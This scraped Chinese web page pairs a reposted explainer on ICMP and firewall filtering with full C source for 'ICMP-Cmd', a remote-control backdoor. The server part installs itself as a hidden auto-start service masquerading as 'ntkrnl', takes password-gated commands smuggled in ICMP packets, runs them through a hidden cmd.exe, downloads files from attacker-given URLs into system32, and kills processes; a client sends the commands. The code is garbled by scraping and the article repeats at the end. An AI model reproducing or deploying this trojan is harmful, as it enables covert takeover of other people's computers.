联盟进去的时候出现error find sendmsg failed with error 1什么意思
点击联系发帖人
时间:2015-06-26 08:54
基于visual c++之windows核心编程代码分析(29)ICMP实现远程把持 分享 - 谷普下载基于visual c++之windows核心编程代码分析(29)ICMP实现远程把持点击复制内容
是(Internet Control Message Protocol)Internet把持报文协议。它是TCP/IP协议族的一个子协议,用于在IP主机、路由器之间传递把持消息。把持消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些把持消息虽然并不传输用户数据,但是对于用户数据的传递起着首要的作用。 协议是一种面向无连接的协议,用于传输出错报告把持信息。它是一个非常首要的协议,它对于网络安全具有极其首要的意义。 它是TCP/IP协议族的一个子协议,属于网络层协议,主要用于在主机与路由器之间传递把持信息,包括报告差错、受限把持和状态信息等。当遇到IP数据无法造访目标、IP路由器无法按当前的传输速率转发数据包等情况时,会自动发送ICMP消息。 ICMP原理ICMP供给一致易懂的出错报告信息。发送的出错报文返回到发送原数据的设备,因为只有发送设备才是出错报文的逻辑接受者。发送设备随后可根据ICMP报文断定发生差错的类型,并断定如何才干更好地重发失败的数据包。但是ICMP唯一的功能是报告而不是纠正差错,纠正差错的任务由发送方完成。 我们在网络中经常会到ICMP协议,比如我们经常的用于反省网络通不通的Ping命令(Linux和Windows中均有),这个“Ping”的历程实际上就是ICMP协议工作的历程。还有其他的网络命令如跟踪路由的Tracert命令也是ICMP协议的。ICMP的全称是 Internet Control Message Protocol 。从技巧角度来说,ICMP就是一个“差错侦测与回报机制”,其目的就是让我们能够检测网路的连线状况o也能确保连线的准确性o其功能主要有: ? 侦测远端主机是否存在。 ? 建立及维护路由资料。 ? 重导资料传送路径。 ? 资料流量把持。IICMP在沟通之中,主要是透过不同的类别(Type)与(Code) 让机器来识别不同的连线状况。常用的类别如下表所列s ICMP 是个非常有用的协议o尤其是当我们要对网路连接状况进行判断的时候。下面让我们看看常用的 ICMP 实例,以更好领会 ICMP 的功能与作用。下面是针对每个ICMP消息类型的过滤规则的详细。Echo Request和Reply(类型8和0): 允许Echo Request消息出站以便于内部用户能够PING一个远程主机。禁止入站Echo Request和出站Echo Reply可以防止外部网络的主机对内部网络进行扫描。如果您应用了位于外部网络的监视器来监视内部网络,就应该只允许来自于特定外部IP的Echo Request进入您的网络。限制ICMP Echo包的大小可以防止“Ping Floods”攻击,并且可以禁止那些利用Echo Request和Reply来“偷运”数据通过防火墙的木马。Destination unreachable (类型3): 允许其入站以便于内部网用户可以应用traceroute。需要注意的是,有些攻击者可以应用它来进行针对会话的DoS攻击,如果您曾经历过类似的攻击,也可以禁止它。禁止出站的ICMP Destination unreachable消息,因为它可能会透露内部网络的结构。不过有一个例外,对于那些允许外部网络通过TCP造访的内部主机(如位于DMZ区的Web 服务器)发出的Destination unreachable,则应该允许它通过。为了能够支持“Path MTU Discovery”,您应该允许出站的“Packet Too Big”消息(类型3,4)到达那些主机。Source quench(类型4): 禁止其入站,因为它可以作为一种DoS攻击,能够降低发送者的发送速度。允许其出站以便于内部主机能够把持发送端发送数据的速度。有些防火墙会漠视所有直接发送到防火墙端口的Source Quench消息,,以防止针对于防火墙的DoS攻击。Redirect(类型5,9,10): Redirect、Router announcement、 Router selection(类型5,9,10):这些消息都存在潜在危险,因为它们可以用来把数据重定向到攻击者的机器。这些消息都应该被禁止。TTL exceeded(类型11): 允许其进站以便于内部用户可以应用traceroute。“firewalking”应用很低的TTL值来对网络进行扫描,甚至可以通过防火墙对内网进行扫描,所以应该阻挠其出站。一些防火墙可以禁止TTL值小于设定值的数据包进入防火墙。Parameter problem(类型12): 阻挠其入站和出站。通过应用一个能够进行数据包一致性反省的防火墙,差错和恶意的数据包都会被阻塞。如下#include &winsock2.h&
#include &stdio.h&
#include &stdlib.h&
#pragma comment(lib,"ws2_32.lib")
char SendMsg[256];
/* The IP header */
typedef struct iphdr {
unsigned int h_len:4; //4位首部长度
unsigned int version:4; //IP版本号,4表示IPV4
//8位服务类型TOS
unsigned short total_ //16位总长度(字节)
//16位标识
unsigned short frag_and_ //3位标志位
//8位生存光阴 TTL
//8位协议 (TCP, UDP 或其他)
uns //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
typedef struct _ihdr
BYTE i_//8位类型
BYTE i_ //8位代码
USHORT i_//16位校验和
USHORT i_//识别号(一般用进程号作为识别号)
USHORT i_//报文序列号
ULONG//光阴截
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 2000
char arg[1450];
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))
void fill_icmp_data(char *, int);
USHORT checksum(USHORT *, int);
void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数
void help(void);
void usage(char * prog);
int main(int argc, char *argv[])
char *ICMP_DEST_IP; //目标主机的IP
if(argc!=2)
usage(argv[0]);
ICMP_DEST_IP=argv[1];//取得目标主机IP
WSADATA wsaD
SOCKET sockR
struct sockaddr_in dest,
int fromlen=sizeof(from);
char *icmp_
if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
fprintf(stderr, "WSAStartup failed: %dn", GetLastError());
ExitProcess(STATUS_FAILED);
sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
int timeout=1000;
setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) &timeout, sizeof(timeout));
timeout=4000;
setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) &timeout, sizeof(timeout));
memset(&dest,0,sizeof(dest));
dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP);
dest.sin_family=AF_INET;
usage(argv[0]);
printf("ICMP-CMD&");
fgets(SendMsg,1024,stdin);//取得命令行,保存在SendMsg数组中
if(!strcmp(SendMsg,"Qn")||!strcmp(SendMsg,"qn"))ExitProcess(0);
if(!strcmp(SendMsg,"n"))
if(!strcmp(SendMsg,"Hn")||!strcmp(SendMsg,"hn")){help();}
if(!memcmp(SendMsg,"http://",7))
if(!strstr(SendMsg,"-")){printf("nFileName Error. Use "-FileName"n");}
datasize=strlen(SendMsg);
datasize+=sizeof(IcmpHeader);
printf("ICMP packet size is %d",datasize);
icmp_data= (char*)xmalloc(MAX_PACKET);
recvbuf= (char *)xmalloc(MAX_PACKET);
memset(icmp_data,0, MAX_PACKET);
fill_icmp_data(icmp_data, datasize);
((IcmpHeader *)icmp_data)-&i_cksum=0;
((IcmpHeader *)icmp_data)-&i_cksum=checksum((USHORT *)icmp_data, datasize);
int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *) &dest, sizeof(dest));
if (bwrote == SOCKET_ERROR)
if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed outn");
fprintf(stderr,"sendto failed: %dn",WSAGetLastError());
if (bwrote&datasize ) {//没有把所有的数据发送出去,也出错了。
printf("nSend Packet to %s Success!n",argv[1]);
DWORD start = GetTickCount();
if((GetTickCount() - start) &= 1000)
memset(recvbuf,0,MAX_PACKET);
int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) &from, &fromlen);
if(bread == SOCKET_ERROR)
if(WSAGetLastError() == WSAETIMEDOUT)
printf("timed outn");
fprintf(stderr, "recvfrom failed: %dn", WSAGetLastError());
decode_resp(recvbuf, bread, &from);
}//end for
}//end try
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
USHORT checksum(USHORT *buffer, int size)
unsigned long cksum=0;
while(size & 1)
cksum+=*buffer++;
size-=sizeof(USHORT);
cksum+=*(UCHAR *)
cksum=(cksum && 16) + (cksum & 0xffff);
cksum+=(cksum && 16);
return(USHORT) (~cksum);
void fill_icmp_data(char *icmp_data, int datasize)
IcmpHeader *icmp_
icmp_hdr= (IcmpHeader *)icmp_
icmp_hdr-&i_type=0;
icmp_hdr-&i_code=0;
icmp_hdr-&i_id=(USHORT)GetCurrentProcessId();
icmp_hdr-×tamp =GetTickCount();
icmp_hdr-&i_seq=1234;
datapart=icmp_data + sizeof(IcmpHeader);
memcpy(datapart,SendMsg,sizeof(SendMsg));
void usage(char * prog)
printf("tt=====Welcome to ======n");
printf("n");
printf("tt---[ ICMP-Cmd v1.0 beta, by gxisone
printf("tt---[ E-mail:
printf("tt---[
printf("ttusage: %s RemoteIPn",prog);
printf("ttCtrl+C or Q/q to Quite
H/h for helpn");
void decode_resp(char *buf, int bytes,struct sockaddr_in *from)
memset(arg,0,sizeof(arg));
IpHeader *
IcmpHeader *
iphdr = (IpHeader *)
iphdrlen = iphdr-&h_len * 4 ;
icmphdr = (IcmpHeader*)(buf + iphdrlen);
if(icmphdr-&i_seq==4321)//密码正确则输出数据段
printf("%d bytes from %s:",bytes, inet_ntoa(from-&sin_addr));
printf(" IcmpType %d",icmphdr-&i_type);
printf(" IcmpCode %d",icmphdr-&i_code);
printf("n");
memcpy(arg,buf+iphdrlen+12,1450);
printf("%s",arg);
else printf("Other ICMP Packets!n");
void help(void)
printf("n");
printf("[ -admin.exe]
(Download Files. Parth is \system32)n");
printf("[pslist]
(List the Process)n");
printf("[pskill ID]
(Kill the Process)n");
printf("Command
(run the command)n");
printf("n");
}服务端如下
#include &winsock2.h&
#include &stdio.h&
#include &urlmon.h&
#include &tlhelp32.h&
#include "stdafx.h"
#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "ws2_32.lib")
#define ICMP_PASSWORD 1234
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 6500
#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))
/* The IP header */
typedef struct iphdr {
unsigned int h_len:4; //4位首部长度
unsigned int version:4; //IP版本号,4表示IPV4
//8位服务类型TOS
unsigned short total_ //16位总长度(字节)
//16位标识
unsigned short frag_and_ //3位标志位
//8位生存光阴 TTL
//8位协议 (TCP, UDP 或其他)
uns //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
//定义ICMP首部
typedef struct _ihdr
BYTE i_ //8位类型
BYTE i_ //8位代码
USHORT i_ //16位校验和
USHORT i_ //识别号(一般用进程号作为识别号)
USHORT i_ //报文序列号
ULONG //光阴戳
char arg[256];
char buffer[2048] = {0};//管道输出的数据
void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数
void fill_icmp_data(char * icmp_data);
void pslist(void);
BOOL killps(DWORD id);//杀进程函数
void send(void);
char *ICMP_DEST_IP;
USHORT checksum(USHORT *buffer, int size);
SERVICE_STATUS
SERVICE_STATUS_HANDLE ServiceStatusH
WINAPI ICMP_CmdStart(DWORD,LPTSTR *);
WINAPI CmdControl(DWORD);
DWORD WINAPI CmdService(LPVOID);
InstallCmdService(void);
RemoveCmdService(void);
usage(char *par);
int main(int argc,char *argv[])
SERVICE_TABLE_ENTRY DispatchTable[]={{"ntkrnl",ICMP_CmdStart},{NULL,NULL}};
if(argc==2)
if(!stricmp(argv[1],"-install"))
usage(argv[0]);
InstallCmdService();
else if(!stricmp(argv[1],"-remove"))
usage(argv[0]);
RemoveCmdService();
else usage(argv[0]);
else usage(argv[0]);
StartServiceCtrlDispatcher(DispatchTable);
void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR *lpArgv)
ServiceStatus.dwServiceType
= SERVICE_WIN32;
ServiceStatus.dwCurrentState
= SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted
= SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwWin32ExitCode
ServiceStatus.dwCheckPoint
ServiceStatus.dwWaitHint
ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl",CmdControl);
if(ServiceStatusHandle==0)
OutputDebugString("RegisterServiceCtrlHandler Error !n");
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint
ServiceStatus.dwWaitHint
if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
OutputDebugString("SetServiceStatus in CmdStart Error !n");
hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
if(hThread==NULL)
OutputDebugString("CreateThread in CmdStart Error !n");
void WINAPI CmdControl(DWORD dwCode)
switch(dwCode)
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState = SERVICE_PAUSED;
case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
case SERVICE_CONTROL_STOP:
WaitForSingleObject(hMutex,INFINITE);
ServiceStatus.dwCurrentState
= SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint
ServiceStatus.dwWaitHint
if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
OutputDebugString("SetServiceStatus in CmdControl in Switch Error !n");
ReleaseMutex(hMutex);
CloseHandle(hMutex);
case SERVICE_CONTROL_INTERROGATE:
if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
OutputDebugString("SetServiceStatus in CmdControl out Switch Error !n");
DWORD WINAPI CmdService(LPVOID lpParam)//这里是服务的主函数,把你的代码写在这里就可以成为服务
char *icmp_
int bread,datasize,
SOCKET sockRaw = (SOCKET)NULL;
WSADATA wsaD
struct sockaddr_in dest,
int fromlen = sizeof(from);
int timeout = 2000;
if ((retval = WSAStartup(MAKEWORD(2,1),&wsaData)) != 0)
printf("WSAStartup failed: %sn",retval);
ExitProcess(STATUS_FAILED);
sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED);
if (sockRaw == INVALID_SOCKET)
printf("WSASocket() failed: %sn",WSAGetLastError());
ExitProcess(STATUS_FAILED);
bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout));
if(bread == SOCKET_ERROR) __
memset(&dest,0,sizeof(dest));
dest.sin_family = AF_INET;
datasize=0;
datasize += sizeof(IcmpHeader);
icmp_data =(char*)xmalloc(MAX_PACKET);
recvbuf = (char*)xmalloc(MAX_PACKET);
if (!icmp_data) {
//fprintf(stderr,"HeapAlloc failed %dn",GetLastError());
memset(icmp_data,0,MAX_PACKET);
bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest));
bread = recvfrom(sockRaw,recvbuf,MAX_PACKET,0,(struct sockaddr*)&from,&fromlen);
if (bread == SOCKET_ERROR)
if (WSAGetLastError() == WSAETIMEDOUT)
decode_resp(recvbuf,bread,&from);
Sleep(200);
memset(recvbuf,0,sizeof(recvbuf));
__finally {
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
void InstallCmdService(void)
lpCurrentPath[MAX_PATH];
lpImagePath[MAX_PATH];
WIN32_FIND_DATA
SERVICE_STATUS
InstallServiceS
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath,"ntkrnl.exe");
lpHostName=NULL;
printf("Transmitting File ... ");
hSearch=FindFirstFile(lpImagePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE)
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0)
dwErrorCode=GetLastError();
if(dwErrorCode==5)
printf("Failure ... Access is Denied !n");
printf("Failure !n");
printf("Success !n");
printf("already Exists !n");
FindClose(hSearch);
schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if(schSCManager==NULL)
printf("Open Service Control Manager Database Failure !n");
printf("Creating Service .... ");
schService=CreateService(schSCManager,"ntkrnl","ntkrnl",SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL);
if(schService==NULL)
dwErrorCode=GetLastError();
if(dwErrorCode!=ERROR_SERVICE_EXISTS)
printf("Failure !n");
CloseServiceHandle(schSCManager);
printf("already Exists !n");
schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);
if(schService==NULL)
printf("Opening Service .... Failure !n");
CloseServiceHandle(schSCManager);
printf("Success !n");
printf("Starting Service .... ");
if(StartService(schService,0,NULL)==0)
dwErrorCode=GetLastError();
if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
printf("already Running !n");
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
printf("Pending ... ");
while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)
if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING)
Sleep(100);
if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)
printf("Failure !n");
printf("Success !n");
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
void RemoveCmdService(void)
lpImagePath[MAX_PATH];
WIN32_FIND_DATA
SERVICE_STATUS
RemoveServiceS
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath,"ntkrnl.exe");
lpHostName=NULL;
schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if(schSCManager==NULL)
printf("Opening SCM ......... ");
dwErrorCode=GetLastError();
if(dwErrorCode!=5)
printf("Failure !n");
printf("Failuer ... Access is Denied !n");
schService=OpenService(schSCManager,"ntkrnl",SERVICE_ALL_ACCESS);
if(schService==NULL)
printf("Opening Service ..... ");
dwErrorCode=GetLastError();
if(dwErrorCode==1060)
printf("no Exists !n");
printf("Failure !n");
CloseServiceHandle(schSCManager);
printf("Stopping Service .... ");
if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
printf("already Stopped !n");
printf("Pending ... ");
if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)
Sleep(10);
QueryServiceStatus(schService,&RemoveServiceStatus);
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
printf("Success !n");
printf("Failure !n");
printf("Failure !n");
printf("Query Failure !n");
printf("Removing Service .... ");
if(DeleteService(schService)==0)
printf("Failure !n");
printf("Success !n");
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
printf("Removing File ....... ");
Sleep(1500);
hSearch=FindFirstFile(lpImagePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE)
printf("no Exists !n");
if(DeleteFile(lpImagePath)==0)
printf("Failure !n");
printf("Success !n");
FindClose(hSearch);
void decode_resp(char *buf, int bytes,struct sockaddr_in *from)
IpHeader *
IcmpHeader *
iphdr = (IpHeader *)
iphdrlen = iphdr-&h_len * 4 ;
icmphdr = (IcmpHeader*)(buf + iphdrlen);
if(icmphdr-&i_seq==ICMP_PASSWORD)//密码正确则输出数据段
ICMP_DEST_IP=inet_ntoa(from-&sin_addr);//取得ICMP包的源地址
memcpy(arg,buf+iphdrlen+12,256);
if (!memcmp(arg,"pskill",6))
killps(atoi(strstr(arg," ")));
memcpy(buffer,"Process is Killed!",sizeof("Process is Killed!"));
else if (!memcmp(arg,"pslist",6)){pslist();send();}
else if (!strcmp(arg,"removen"))
RemoveCmdService();
memcpy(buffer,"Service Removed!",sizeof("Service Removed!"));
////////////************
*************
else if (!memcmp(arg,"http://",7))
if(char *FileName=strstr(arg,"-"))
char url[200];//保存的数组
memset(url,0,200);
memcpy(url,arg,int(FileName-arg-1));
char fname[MAX_PATH];
GetSystemDirectory(fname,MAX_PATH);
FileName++;
strcat(fname,"");
strcat(fname,FileName);
*strstr(fname,"n")=NULL;
HRESULT hRet=URLDownloadToFile(0,url,fname,0,0);
memset(buffer,0,sizeof(buffer));
if(hRet==S_OK) memcpy(buffer,"Download OK!n",sizeof("Download OKn"));
memcpy(buffer,"Download Failure!n",sizeof("Download Failure!n"));
//*******************************************
SECURITY_ATTRIBUTES//创建匿名管道用于取得cmd的命令输出
HANDLE hRead,hW
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead,&hWrite,&sa,0))
printf("Error On CreatePipe()");
STARTUPINFO
PROCESS_INFORMATION
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError = hW
si.hStdOutput = hW
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
char cmdline[270];
GetSystemDirectory(cmdline,MAX_PATH+1);
strcat(cmdline,"cmd.exe /c");
strcat(cmdline,arg);
if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
printf("Error on CreateProcess()");
CloseHandle(hWrite);
DWORD bytesR
if (!ReadFile(hRead,buffer,2048,&bytesRead,NULL))
Sleep(200);
//printf("%s",buffer);
/////////////////////////////////////////////
//发送输出数据
////////////////////////////////////////////////
//else printf("Other ICMP Packets!n");
USHORT checksum(USHORT *buffer, int size)
unsigned long cksum=0;
while(size &1)
cksum+=*buffer++;
size -=sizeof(USHORT);
if(size ) {
cksum += *(UCHAR*)
cksum = (cksum && 16) + (cksum & 0xffff);
cksum += (cksum &&16);
return (USHORT)(~cksum);
void fill_icmp_data(char * icmp_data)
IcmpHeader *icmp_
icmp_hdr = (IcmpHeader*)icmp_
icmp_hdr-&i_type = 0;
icmp_hdr-&i_code = 0;
icmp_hdr-&i_id = (USHORT) GetCurrentProcessId();
icmp_hdr-&i_cksum = 0;
icmp_hdr-&i_seq =4321;
icmp_hdr-×tamp = GetTickCount(); //设置光阴戳
datapart = icmp_data + sizeof(IcmpHeader);
memcpy(datapart,buffer,strlen(buffer));
//for(int i=0;i&sizeof(buffer);i++) datapart[i]=buffer[i];
usage(char *par)
printf("tt=====Welcome to ======n");
printf("n");
printf("tt---[ ICMP-Cmd v1.0 beta, by gxisone
printf("tt---[ E-mail:
printf("tt---[
printf("n");
printf("ttUsage: %s -install (to install service)n",par);
printf("tt
%s -remove (to remove service)n",par);
printf("n");
void send(void)
WSADATA wsaD
SOCKET sockRaw = (SOCKET)NULL;
struct sockaddr_
int bread,datasize,retval,
int timeout = 1000;
char *icmp_
if((retval=WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) ExitProcess(STATUS_FAILED);
if((sockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED))
==INVALID_SOCKET) ExitProcess(STATUS_FAILED);
if((bread=setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout)))==SOCKET_ERROR) __
//设置发送超时
memset(&dest,0,sizeof(dest));
dest.sin_family = AF_INET;
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
datasize=strlen(buffer);
datasize+=sizeof(IcmpHeader);
icmp_data=(char*)xmalloc(MAX_PACKET);
if(!icmp_data) __
memset(icmp_data,0,MAX_PACKET);
fill_icmp_data(icmp_data); //填充ICMP报文
((IcmpHeader*)icmp_data)-&i_cksum = checksum((USHORT*)icmp_data, datasize); //计算校验和
bwrote=sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); //发送报文
if (bwrote == SOCKET_ERROR)
//if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed outn");
//printf("sendto failed:"&&WSAGetLastError()&&
//printf("Send Packet to %s Success!n"&&ICMP_DEST_IP&&
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
memset(buffer,0,sizeof(buffer));
Sleep(200);
void pslist(void)
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32= {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == (HANDLE)-1)
printf("nCreateToolhelp32Snapshot() failed:%d",GetLastError());
pe32.dwSize = sizeof(PROCESSENTRY32);
printf("nProcessName ProcessID");
if (Process32First(hProcessSnap, &pe32))
char a[5];
strcat(buffer,pe32.szExeFile);
strcat(buffer,"tt");
itoa(pe32.th32ProcessID,a,10);
strcat(buffer,a);
strcat(buffer,"n");
//printf("n%-20s%d",pe32.szExeFile,pe32.th32ProcessID);
while (Process32Next(hProcessSnap, &pe32));
printf("nProcess32Firstt() failed:%d",GetLastError());
CloseHandle (hProcessSnap);
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)//提示权限
TOKEN_PRIVILEGES
if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
printf("nLookupPrivilegeValue error:%d", GetLastError() );
return FALSE;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid =
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
AdjustTokenPrivileges(
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
// Call GetLastError to determine whether the function succeeded.
if (GetLastError() != ERROR_SUCCESS)
printf("AdjustTokenPrivileges failed: %un", GetLastError() );
return FALSE;
return TRUE;
////////////////////////////////////////////////////////////////////////////
BOOL killps(DWORD id)//杀进程函数
HANDLE hProcess=NULL,hProcessToken=NULL;
BOOL IsKilled=FALSE,bRet=FALSE;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken))
printf("nOpen Current Process Token failed:%d",GetLastError());
//printf("nOpen Current Process Token ok!");
if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
printf("nSetPrivilege ok!");
if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
printf("nOpen Process %d failed:%d",id,GetLastError());
//printf("nOpen Process %d ok!",id);
if(!TerminateProcess(hProcess,1))
printf("nTerminateProcess failed:%d",GetLastError());
IsKilled=TRUE;
if(hProcessToken!=NULL) CloseHandle(hProcessToken);
if(hProcess!=NULL) CloseHandle(hProcess);
return(IsKilled);
来源:谷普下载}
是(Internet Control Message Protocol)Internet把持报文协议。它是TCP/IP协议族的一个子协议,用于在IP主机、路由器之间传递把持消息。把持消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些把持消息虽然并不传输用户数据,但是对于用户数据的传递起着首要的作用。 协议是一种面向无连接的协议,用于传输出错报告把持信息。它是一个非常首要的协议,它对于网络安全具有极其首要的意义。 它是TCP/IP协议族的一个子协议,属于网络层协议,主要用于在主机与路由器之间传递把持信息,包括报告差错、受限把持和状态信息等。当遇到IP数据无法造访目标、IP路由器无法按当前的传输速率转发数据包等情况时,会自动发送ICMP消息。 ICMP原理ICMP供给一致易懂的出错报告信息。发送的出错报文返回到发送原数据的设备,因为只有发送设备才是出错报文的逻辑接受者。发送设备随后可根据ICMP报文断定发生差错的类型,并断定如何才干更好地重发失败的数据包。但是ICMP唯一的功能是报告而不是纠正差错,纠正差错的任务由发送方完成。 我们在网络中经常会到ICMP协议,比如我们经常的用于反省网络通不通的Ping命令(Linux和Windows中均有),这个“Ping”的历程实际上就是ICMP协议工作的历程。还有其他的网络命令如跟踪路由的Tracert命令也是ICMP协议的。ICMP的全称是 Internet Control Message Protocol 。从技巧角度来说,ICMP就是一个“差错侦测与回报机制”,其目的就是让我们能够检测网路的连线状况o也能确保连线的准确性o其功能主要有: ? 侦测远端主机是否存在。 ? 建立及维护路由资料。 ? 重导资料传送路径。 ? 资料流量把持。IICMP在沟通之中,主要是透过不同的类别(Type)与(Code) 让机器来识别不同的连线状况。常用的类别如下表所列s ICMP 是个非常有用的协议o尤其是当我们要对网路连接状况进行判断的时候。下面让我们看看常用的 ICMP 实例,以更好领会 ICMP 的功能与作用。下面是针对每个ICMP消息类型的过滤规则的详细。Echo Request和Reply(类型8和0): 允许Echo Request消息出站以便于内部用户能够PING一个远程主机。禁止入站Echo Request和出站Echo Reply可以防止外部网络的主机对内部网络进行扫描。如果您应用了位于外部网络的监视器来监视内部网络,就应该只允许来自于特定外部IP的Echo Request进入您的网络。限制ICMP Echo包的大小可以防止“Ping Floods”攻击,并且可以禁止那些利用Echo Request和Reply来“偷运”数据通过防火墙的木马。Destination unreachable (类型3): 允许其入站以便于内部网用户可以应用traceroute。需要注意的是,有些攻击者可以应用它来进行针对会话的DoS攻击,如果您曾经历过类似的攻击,也可以禁止它。禁止出站的ICMP Destination unreachable消息,因为它可能会透露内部网络的结构。不过有一个例外,对于那些允许外部网络通过TCP造访的内部主机(如位于DMZ区的Web 服务器)发出的Destination unreachable,则应该允许它通过。为了能够支持“Path MTU Discovery”,您应该允许出站的“Packet Too Big”消息(类型3,4)到达那些主机。Source quench(类型4): 禁止其入站,因为它可以作为一种DoS攻击,能够降低发送者的发送速度。允许其出站以便于内部主机能够把持发送端发送数据的速度。有些防火墙会漠视所有直接发送到防火墙端口的Source Quench消息,,以防止针对于防火墙的DoS攻击。Redirect(类型5,9,10): Redirect、Router announcement、 Router selection(类型5,9,10):这些消息都存在潜在危险,因为它们可以用来把数据重定向到攻击者的机器。这些消息都应该被禁止。TTL exceeded(类型11): 允许其进站以便于内部用户可以应用traceroute。“firewalking”应用很低的TTL值来对网络进行扫描,甚至可以通过防火墙对内网进行扫描,所以应该阻挠其出站。一些防火墙可以禁止TTL值小于设定值的数据包进入防火墙。Parameter problem(类型12): 阻挠其入站和出站。通过应用一个能够进行数据包一致性反省的防火墙,差错和恶意的数据包都会被阻塞。如下#include &winsock2.h&
#include &stdio.h&
#include &stdlib.h&
#pragma comment(lib,"ws2_32.lib")
char SendMsg[256];
/* The IP header */
typedef struct iphdr {
unsigned int h_len:4; //4位首部长度
unsigned int version:4; //IP版本号,4表示IPV4
//8位服务类型TOS
unsigned short total_ //16位总长度(字节)
//16位标识
